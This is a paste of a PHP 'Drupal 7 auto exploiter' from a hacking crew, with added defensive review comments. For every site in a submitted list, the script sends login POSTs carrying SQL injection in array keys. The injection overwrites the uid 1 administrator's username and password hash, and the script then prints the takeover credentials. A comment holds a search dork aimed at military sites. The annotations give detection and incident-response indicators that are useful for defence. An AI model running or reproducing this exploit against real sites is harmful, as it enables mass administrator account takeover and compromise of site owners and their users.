
Untitled

a guest
Mar 10th, 2017
  1. <html><title>Drupal 7.x Auto Exploiter</title>
  2. <body bgcolor="#000000">
  3. <font color='red'><pre><p><center>
  4. ==========================================================================================================
  5.  
  6. ===================================================================
  7. ___ ___ ___ _____
  8. / _ \ _ __ __ _ ___ / _ \ / _ \___ |
  9. | (_) | '_ \ / _` / __| | | | | | | | / /
  10. \__, | | | | (_| \__ \ | |_| | |_| |/ /
  11. /_/|_| |_|\__,_|___/ \___/ \___//_/
  12. hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
  13. uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
  14. #Drupal Auto Exploiter
  15. #Coded by AnonGhostDZ-Team
  16. #Contact: fb ==> AnonGhostDZ-Team
  17. ______________________________________________________________
  18.  
  19. <pre>List Sites :</font><hre>
  20. <form method='POST'>
  21. <textarea name='sites' cols='45' rows='15'></textarea>
  22. <input type='submit' value='Exploit' /><br>
  23. </form>
  24. <?php
      // Review note (defensive reading of this paste).
      // The script reads a newline-separated list of base URLs from the form
      // field `sites` and sends each one a crafted login POST. The POST field
      // name `name[...]` carries SQL text inside the array key; that SQL
      // rewrites the username and password hash of the account with uid 1.
      // NOTE(review): this matches the publicly documented Drupal 7 core SQL
      // injection in the database layer's handling of array-valued query
      // arguments. Confirm against the Drupal security advisory; no advisory
      // id or fixed version is stated on this page. If confirmed, the fix is
      // the core update named in that advisory, and any site that was
      // reachable while unpatched should be reviewed as possibly compromised.
  25. /*
  26. Coded by rvm
  27. inurl:sites/default/files/ site:mil.**
  28. */
      // Turns off all PHP error reporting for this script, so a failed request
      // produces no visible warning.
  29. error_reporting(0);
      // Assigned here but never read in the code shown.
  30. $log = "/user/login";
      // Untrusted form input, split on CRLF and used as request targets with no
      // validation. Anyone who can reach this page can make the hosting server
      // send POSTs to arbitrary URLs, so finding this file on a server you
      // operate should be treated as a sign of compromise or abuse.
  31. $url=explode("\r\n", $_POST['sites']);
  32. foreach ($url as $site) {
      // Assigned on every iteration but never read in the code shown.
  33. $rvm = "/?q=user";
      // Request body. Detection point for WAF rules and request-body logs: a
      // form-encoded key that starts with `name[` and contains SQL inside the
      // brackets (here an `update users set ...` statement ending in `;#`),
      // sent with form_id=user_login and an empty form_build_id. A stock Drupal
      // login form submits `name` as one scalar field, so a bracketed `name[...]`
      // key on a login request is a high-signal pattern.
      // Incident-response indicator: the hard-coded `$S$...` string is the hash
      // written to uid 1, together with the username 'rvm'. Either value in a
      // site's users table for uid 1 means this payload was applied.
  34. $post_data = "name[0;update users set name %3D 'rvm' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
      // Stream-context options: a form-encoded POST carrying $post_data.
      // No other HTTP options are set.
  35. $params = array(
  36. 'http' => array(
  37. 'method' => 'POST',
  38. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  39. 'content' => $post_data
  40. )
  41. );
  42. $ctx = stream_context_create($params);
      // Sends the POST to <site>/user/login/ and keeps the response body.
      // file_get_contents returns false on failure.
  43. $data = file_get_contents($site . '/user/login/', null, $ctx);
      // $site is echoed without HTML escaping.
  44. echo "<font color=blue>Testing user/login $site <br>";
      // Result heuristic: the response must contain either the PHP warning text
      // 'mb_strlen() expects parameter 1 to be string' or the reflected value
      // 'FcUk Crap'. The trailing `&& $data` terms add nothing once stristr has
      // matched. For defenders: a site that shows PHP warnings to visitors
      // exposes this marker. Disabling error display removes the marker but
      // does not fix the underlying flaw, so a "Not Vulnerable" line from this
      // script is not evidence that a site is patched.
  45. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
      // Prints the username and password the tool claims now apply to uid 1.
  46. echo "<font color=green>User :rvm <br>Password :admin<br>";
  47. } else {
  48. echo "<font color=red>Not Vulnerable. <br>";
  49. }
  50. }
  51. $url=explode("\r\n", $_POST['sites']);
      // Second pass over the same unvalidated `sites` list. It repeats the
      // uid 1 username/password-hash rewrite, but submits it as the login
      // block form (form_id=user_login_block) to the site's front-page route
      // instead of /user/login/.
      // NOTE(review): the payload shape matches the publicly documented
      // Drupal 7 core SQL injection via array keys in query arguments.
      // Confirm against the Drupal security advisory; no advisory id or fixed
      // version is stated on this page.
  52. foreach ($url as $site) {
      // Request body. Detection point: a form-encoded key that starts with
      // `name[` and contains SQL inside the brackets, sent with
      // form_id=user_login_block and an empty form_build_id. A stock Drupal
      // login block submits `name` as one scalar field.
      // Incident-response indicator: a uid 1 account named 'rvm', or carrying
      // the hard-coded `$S$...` hash below, means this payload was applied.
  53. $post_data = "name[0;update users set name %3D 'rvm' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
      // Stream-context options: a form-encoded POST carrying $post_data.
  54. $params = array(
  55. 'http' => array(
  56. 'method' => 'POST',
  57. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  58. 'content' => $post_data
  59. )
  60. );
  61. $ctx = stream_context_create($params);
      // The query string is appended directly to $site with no separating
      // slash. The response body is kept, or false on failure.
  62. $data = file_get_contents($site . '?q=node&destination=node', null, $ctx);
      // $site is echoed without HTML escaping.
  63. echo "<font color=blue>Testing at Index $site <br>";
      // Result heuristic: only the PHP warning text is checked here. A site
      // that hides PHP warnings from visitors is reported "Not Vulnerable"
      // whether or not it is patched, so this output is not a patch check.
  64. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
      // Prints the username and password the tool claims now apply to uid 1.
  65. echo "<font color=green>User :rvm <br> Password :admin <br>";
  66.  
  67. } else {
  68. echo "<font color=red>Not Vulnerable. \n ";
  69. }
  70. }
  71. ?>
  72. </pre></p></center>